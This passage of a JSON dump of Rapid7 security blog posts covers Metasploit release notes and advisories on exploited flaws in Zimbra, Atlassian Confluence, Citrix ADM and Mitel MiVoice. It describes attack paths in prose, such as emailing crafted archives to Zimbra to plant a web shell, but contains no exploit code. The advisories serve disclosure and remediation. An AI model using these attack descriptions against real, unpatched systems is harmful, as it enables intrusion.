This could lead to dangling channels being opened which would not be closed until Meterpreter was shut down.\n * [#16935](<https://github.com/rapid7/metasploit-framework/pull/16935>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes multiple SSH warnings when loading msfconsole on Ubuntu 22.04 or the latest Kali version.\n * [#16936](<https://github.com/rapid7/metasploit-framework/pull/16936>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when using evasion modules when `mingw` is not present on the host machine for generating encrypted payloads.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.13...6.2.14](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-18T10%3A41%3A42-05%3A00..2022-08-25T17%3A06%3A18%2B01%3A00%22>)\n * [Full diff 6.2.13...6.2.14](<https://github.com/rapid7/metasploit-framework/compare/6.2.13...6.2.14>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-26T21:47:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23277", "CVE-2022-27925", "CVE-2022-30333", "CVE-2022-37042"], "modified": "2022-08-26T21:47:13", "id": "RAPID7BLOG:559E0E8D2A3CCC9876788213E94E36A4", "href": "https://blog.rapid7.com/2022/08/26/metasploit-wrap-up-173/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-10-11T22:01:25", "description": "\n\n_Note: Zimbra release [9.0.0 P27](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27>) addressed this vulnerability on October 10, 2022._\n\n[CVE-2022-41352](<https://nvd.nist.gov/vuln/detail/CVE-2022-41352>) is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite 
discovered in the wild due to [active exploitation](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>). The vulnerability is due to the method (`cpio`) in which Zimbra\u2019s antivirus engine (Amavis) scans inbound emails. Zimbra has provided a [workaround](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>), which is to install the `pax` utility and restart the Zimbra services. Note that `pax` is installed by default on Ubuntu, so Ubuntu-based Zimbra installations are not vulnerable by default.\n\n> **Note:** This vulnerability, CVE-2022-41352 is effectively identical to [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333>) but leverages a different file format (`.cpio` and `.tar` as opposed to `.rar`). It is also a byproduct of a much older (unfixed) vulnerability, [CVE-2015-1197](<https://nvd.nist.gov/vuln/detail/CVE-2015-1197>). While the original CVE-2015-1197 affects most major Linux distros, our research team found that it is **not exploitable** unless a secondary application \u2013 such as Zimbra, in this case \u2013 uses `cpio` to extract untrusted archives; therefore, this blog is only focusing on Zimbra CVE-2022-41352.\n\nRapid7 has published technical documentation, including proof-of-concept (PoC) and indicator-of-compromise (IoC) information, regarding CVE-2022-41352 on [AttackerKB](<https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis?utm_source=blog&utm_medium=referral&utm_campaign=etr_cve_2022_41352>).\n\n## Background\n\nTo exploit this vulnerability, an attacker would email a `.cpio`, `.tar`, or `.rpm` to an affected server. When Amavis inspects it for malware, it uses `cpio` to extract the file. Since `cpio` has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access. 
The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.\n\nAs of October 6, 2022, CVE-2022-41352 is not patched, but Zimbra has acknowledged the risk of relying on `cpio` in a [blog post](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>) where they recommend mitigations. CVE-2022-41352 was discovered in the wild due to [active exploitation](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>). Recently, CISA and others [have warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>) of multiple threat actors leveraging other vulnerabilities in Zimbra, which makes it likely that threat actors would logically move to exploit this latest unpatched vulnerability, too. In August, Rapid7 reported on the [active exploitation of multiple vulnerabilities in Zimbra Collaboration Suite](<https://www.rapid7.com/blog/post/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/>).\n\n## Affected products\n\n**Please note that information on affected versions or requirements for exploitability may change as we learn more about the threat.**\n\nTo be exploitable, two conditions must exist:\n\n 1. A vulnerable version of `cpio` must be installed, which is the case on basically every system (see [CVE-2015-1197](<https://nvd.nist.gov/vuln/detail/CVE-2015-1197>))\n 2. The `pax` utility must **not** be installed, as Amavis prefers `pax` and `pax` is not vulnerable\n\nUnfortunately, `pax` is not installed by default on Red Hat-based distros, and therefore they are vulnerable by default. We tested all (current) Linux distros that Zimbra officially supports in their default configurations and determined the following:\n\nLinux Distro | Vulnerable? 
\n---|--- \nOracle Linux 8 | Vulnerable \nRed Hat Enterprise Linux 8 | Vulnerable \nRocky Linux 8 | Vulnerable \nCentOS 8 | Vulnerable \nUbuntu 20.04 | Not vulnerable (pax is installed by default) \nUbuntu 18.04 | Not vulnerable (pax is installed, cpio has Ubuntu's custom patch) \n \nZimbra says that their plan is to remove the dependency on `cpio` entirely by making `pax` a prerequisite for Zimbra Collaboration Suite. Moving to `pax` is the best option since `cpio` cannot be used securely (because most major operating systems [removed a security patch](<https://lists.gnu.org/archive/html/bug-cpio/2019-11/msg00016.html>)).\n\n## Remediation\n\nZimbra released a patch for CVE-2022-41352 on October 10, 2022. The patched version is [Zimbra Collaboration Suite 9.0.0 P27](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27>). Organizations that use Zimbra should update immediately, without waiting for a regular patch cycle.\n\nIf you are unable to update your Zimbra version, you can apply [Zimbra's recommended workaround](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>), which is to install the `pax` archive utility, then **restart Zimbra or reboot**. We strongly recommend patching, as 9.0.0 P27 also resolves several other vulnerabilities, including [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>), a root privilege escalation.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-41352 via an authenticated vulnerability check (supported by agent and scanner based assessments) available in the October 6 content release (`ContentOnly-content-1.1.2667-202210061843`). This check will identify systems with an affected version of Zimbra Collaboration Suite installed where the `pax` package is not available. 
There is no change required to the default scan templates to enable this check.\n\nOur engineering team is working on updated vulnerability checks to account for the newly released patch.\n\n## Updates\n\n**October 6, 2022, 3:30pm ET:** Updated to include information on the newly released InsightVM/Nexpose check for CVE-2022-41352.\n\n**October 11, 2022:** Zimbra has released Zimbra Collaboration Suite 9.0.0 P27 to address this vulnerability, as well as other security issues. Our engineering team is working on updating our vulnerability checks to account for the patch.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T17:13:34", "type": "rapid7blog", "title": "Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1197", "CVE-2022-30333", "CVE-2022-37393", "CVE-2022-41352"], "modified": "2022-10-06T17:13:34", "id": "RAPID7BLOG:9191651E2ECCE625AEB7BDCAD1EA43F6", "href": 
"https://blog.rapid7.com/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-12T19:33:06", "description": "## Putting in the work!\n\n\n\nThis week we\u2019re extra grateful for the fantastic contributions our community makes to Metasploit. The Metasploit team landed more than 5 PRs each from [Ron Bowes](<https://github.com/rbowes-r7>) and [bcoles](<https://github.com/bcoles>), adding some great new capabilities.\n\n[Ron Bowes](<https://github.com/rbowes-r7>) contributed four new modules targeting UnRAR, Zimbra, and ManageEngine ADAudit Plus. These modules offer Metasploit users some excellent new vectors to leverage against targets.\n\nContributions from [bcoles](<https://github.com/bcoles>) offer improvements to various session interactions to make gathering data on targets more robust and consistent.\n\n## Have you seen Cassandra?\n\nAre you using tools to visualize your data? If you are using [`cassandra-web`](<https://github.com/avalanche123/cassandra-web>), a tool made specifically to help you "see" what Cassandra holds, there are new toys for attackers to use to access much more. 
The new module from [krastanoel](<https://github.com/krastanoel>) targets `cassandra-web` <= 0.5.0 with a directory traversal to read lots of those sensitive details off the target.\n\n## New module content (6)\n\n * [Cassandra Web File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/16851>) by Jeremy Brown and [krastanoel](<https://github.com/krastanoel>) \\- This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.\n * [UnRAR Path Traversal (CVE-2022-30333)](<https://github.com/rapid7/metasploit-framework/pull/16796>) by [Ron Bowes](<https://github.com/rbowes-r7>) and [Simon Scannell](<https://twitter.com/scannell_simon>), which exploits [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333?referrer=blog>) \\- This adds two modules for CVE-2022-30333, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open-source version 6.1.6 and earlier). The first module creates a `.rar` with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. 
This module generates the `.rar` file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.\n * [Webmin Package Updates RCE](<https://github.com/rapid7/metasploit-framework/pull/16856>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and Emir Polat, which exploits [CVE-2022-36446](<https://attackerkb.com/topics/q1u5OOKCDH/cve-2022-36446?referrer=blog>) \\- This module exploits an arbitrary command injection in Webmin versions prior to 1.997.\n * [UnRAR Path Traversal in Zimbra (CVE-2022-30333)](<https://github.com/rapid7/metasploit-framework/pull/16796>) by [Ron Bowes](<https://github.com/rbowes-r7>) and [Simon Scannell](<https://twitter.com/scannell_simon>), which exploits [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333?referrer=blog>) \\- This adds two modules for `CVE-2022-30333`, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open source version 6.1.6 and earlier). The first module creates a `.rar` with an arbitrary payload that will be extracted to an arbitrary location. The other one specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email and arbitrary command execution is possible if the installed UnRAR on the OS is vulnerable to the same symlink-based path traversal vulnerability. 
This module generates the `.rar` file that will need to be emailed to the vulnerable Zimbra server to trigger the payload.\n * [Zimbra zmslapd arbitrary module load](<https://github.com/rapid7/metasploit-framework/pull/16807>) by [Darren Martyn](<https://twitter.com/_darrenmartyn>) and [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393?referrer=blog>) \\- This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.\n * [ManageEngine ADAudit Plus CVE-2022-28219](<https://github.com/rapid7/metasploit-framework/pull/16758>) by Naveen Sunkavally and [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-28219](<https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219?referrer=blog>) \\- This adds a module that leverages a Java deserialization, directory traversal, and a blind XXE injection vulnerability to gain unauthenticated code execution against vulnerable versions of ManageEngine ADAudit Plus.\n\n## Enhancements and features (6)\n\n * [#16800](<https://github.com/rapid7/metasploit-framework/pull/16800>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This adds support for OpenSSL 3 compatibility with legacy ciphers.\n * [#16841](<https://github.com/rapid7/metasploit-framework/pull/16841>) from [bcoles](<https://github.com/bcoles>) \\- This updates the `post/windows/gather/enum_powershell_env` module with a code cleanup and expands the module to support non-Meterpreter session types such as shell sessions and PowerShell sessions.\n * [#16873](<https://github.com/rapid7/metasploit-framework/pull/16873>) from [bcoles](<https://github.com/bcoles>) \\- This PR cleans up enum_artifacts, adds documentation, error handling, YAML file parsing, and support for non-meterpreter sessions.\n * [#16875](<https://github.com/rapid7/metasploit-framework/pull/16875>) from 
[bcoles](<https://github.com/bcoles>) \\- This PR removes the enum_putty Meterpreter script in favor of the existing post module.\n * [#16876](<https://github.com/rapid7/metasploit-framework/pull/16876>) from [bcoles](<https://github.com/bcoles>) \\- Removes the enum_logged_on_users Meterpreter script in favor of the existing post module.\n * [#16878](<https://github.com/rapid7/metasploit-framework/pull/16878>) from [bcoles](<https://github.com/bcoles>) \\- Adds partial support for non-Meterpreter sessions to the enum_logged_on_users post module, makes use of the read_profile_list method, and resolves Rubocop and msftidy_docs violations.\n\n## Bugs fixed (1)\n\n * [#16872](<https://github.com/rapid7/metasploit-framework/pull/16872>) from [bcoles](<https://github.com/bcoles>) \\- This PR fixes shell_registry_getvalinfo, which was truncating registry values at the first space, and normalize_key, which crashed when only a hive name was passed to it on a shell session.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.11...6.2.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-04T11%3A39%3A27-05%3A00..2022-08-10T15%3A45%3A22-05%3A00%22>)\n * [Full diff 6.2.11...6.2.12](<https://github.com/rapid7/metasploit-framework/compare/6.2.11...6.2.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T18:52:27", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28219", "CVE-2022-30333", "CVE-2022-36446", "CVE-2022-37393"], "modified": "2022-08-12T18:52:27", "id": "RAPID7BLOG:84EC5F57BD07F535627F51F28B2424B1", "href": "https://blog.rapid7.com/2022/08/12/metasploit-weekly-wrap-up-171/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-29T21:59:42", "description": "\n\nExploitation is underway for one of the [trio of critical Atlassian vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) that were published last week affecting several of the company\u2019s on-premises products. 
Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of [CVE-2022-26134 in Confluence Server and Confluence Data Center](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>).\n\n**CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:**\n\n * Confluence Server\n * Confluence Data Center\n\n**CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:**\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Crucible\n * Fisheye\n * Jira Server and Data Center\n * Jira Service Management Server and Data Center\n\n## CVE-2022-26138: Hardcoded password in Questions for Confluence app\n\nThe most critical of these three is [CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization\u2019s Confluence instance. 
Unsurprisingly, it didn\u2019t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers, who often jump on Confluence vulnerabilities to execute ransomware attacks.\n\n## Affected versions\n\n * Questions for Confluence 2.7.x: 2.7.34, 2.7.35\n * Questions for Confluence 3.0.x: 3.0.2\n\n## Mitigation guidance\n\nOrganizations using on-prem Confluence should follow Atlassian\u2019s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian\u2019s advisory also includes information on how to look for evidence of exploitation. An [FAQ](<https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html>) has also been provided.\n\n> Please note: Atlassian\u2019s [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has a very important call-out that \u201cuninstalling the Questions for Confluence app does not remediate this vulnerability.\u201d\n\n## CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities\n\nTwo other vulnerabilities were announced at the same time, [CVE-2022-26136 and CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>), which are also rated critical by Atlassian. Both are issues with Java Servlet Filters and can be exploited by remote, unauthenticated attackers. 
Cloud versions of Atlassian have already been fixed by the company.\n\nThe list of affected versions is long and can be found on [Atlassian\u2019s Security Advisory](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>).\n\nWhile the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-26138 with a remote vulnerability check released on July 29, 2022 (ContentOnly-content-1.1.2602-202207292027).\n\n## Updates\n\n07/29/2022 - 5:30 PM EDT \nUpdated Rapid7 customers section to include information on a new remote vulnerability check.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T19:26:38", "type": "rapid7blog", "title": "Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-27T19:26:38", "id": "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "href": "https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T21:57:35", "description": "\n\nOn Monday, June 14, 2022, Citrix published an [advisory on CVE-2022-27511](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>), a critical improper access control vulnerability affecting their Application Delivery Management (ADM) product.\n\nA remote, unauthenticated attacker can leverage CVE-2022-27511 to reset administrator credentials to the default value at the next reboot. This allows the attacker to use SSH and the default administrator credentials to access the affected management console. The vulnerability has been patched in Citrix ADM 13.1-21.53 and ADM 13.0-85.19 and should be applied as soon as possible. Versions of Citrix ADM before 13.0 and 13.1 are end of life, so Citrix will not make patches available for these versions. Users still on version 12.x are encouraged to upgrade to a supported version.\n\nAt the time of this writing, no exploitation has been observed, and no exploits have been made publicly available. However, given the nature of the vulnerability and the footprint of Citrix ADM, we anticipate that exploitation will happen as soon as an exploit is made available.\n\n## Mitigation guidance\n\nCitrix ADM customers should upgrade their versions of both ADM server and agents as soon as possible. 
Citrix notes in their [advisory](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>) that they strongly recommend that network traffic to the Citrix ADM\u2019s IP address be segmented, either physically or logically, from standard network traffic.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to [CVE-2022-27511](<https://www.rapid7.com/db/vulnerabilities/citrix-adm-cve-2022-27511/>) with an authenticated vulnerability check available in the June 22, 2022 content release. Please note that this check does not support versions 13.1+ of Citrix ADM.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T20:03:55", "type": "rapid7blog", "title": "CVE-2022-27511: Citrix ADM Remote Device Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511"], "modified": "2022-06-16T20:03:55", "id": "RAPID7BLOG:C3FB7B0BA665AC291B6331292F32F47A", "href": 
"https://blog.rapid7.com/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}}, {"lastseen": "2022-07-08T21:58:14", "description": "\n\nIn April 2022, telecommunications company Mitel [published a security advisory](<https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_22-0002-001-v2.pdf>) on CVE-2022-29499, a data validation vulnerability in the Service Appliance component of [MiVoice Connect](<https://www.mitel.com/products/business-phone-systems/on-site/mivoice-connect>), a business communications product. The vulnerability, which was unpatched at time of publication, arose from insufficient data validation for a diagnostic script and potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. CVE-2022-29499 has a CVSSv3 score of 9.8.\n\nOn June 23, 2022, security firm Crowdstrike published an [analysis](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) on a ransomware intrusion attempt that had targeted CVE-2022-29499 \u2014 which at the time of detection was an undisclosed zero-day vulnerability \u2014 as an initial access vector. Over the past two weeks, Rapid7 Managed Detection and Response (MDR) has also observed a small number of intrusions that have leveraged CVE-2022-29499 as an initial access vector.\n\nThere is currently no indication that a large number of these appliances are exposed to the public internet, and we have no evidence that this vulnerability is being targeted in wider-scale ransomware campaigns. 
We are conscious of the fact, however, that the proliferation of ransomware in general has continued to shape risk models for many organizations, and that network perimeter devices are tempting targets for a variety of attackers.\n\n## Affected products\n\nCVE-2022-29499 affects MiVoice Connect deployments (including earlier versions 14.2) that include the MiVoice Connect Service Appliances, SA 100, SA 400 and/or Virtual SA. Vulnerable firmware versions include R19.2 SP3 (22.20.2300.0) and earlier, and R14.x and earlier. See Mitel [product security advisory 22-0002](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) and their [security bulletin](<https://www.mitel.com/-/media/mitel/file/pdf/support/security-advisories/security-bulletin_22-0002-001-v2.pdf>) for additional information.\n\n## Mitigation guidance\n\nMitel MiVoice Connect customers who use vulnerable versions of the Service Appliance in their deployments should update to a fixed version of the appliance immediately. Mitel released patches for CVE-2022-29499 in early June 2022; organizations that have not updated the firmware on their appliances since before that timeframe should apply fixes as soon as possible. Appliances should not be exposed to the open internet. 
Administrators should also review network filters for these devices and employ the principle of least privilege.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-29499 with a remote, version-based vulnerability check in the July 8, 2022 content release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-07T19:09:10", "type": "rapid7blog", "title": "Exploitation of Mitel MiVoice Connect SA CVE-2022-29499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-07-07T19:09:10", "id": "RAPID7BLOG:F35EA4220CACE146EF8E5F845F2B51BF", "href": "https://blog.rapid7.com/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/", "cvss": {"score": 10.0, "vector": 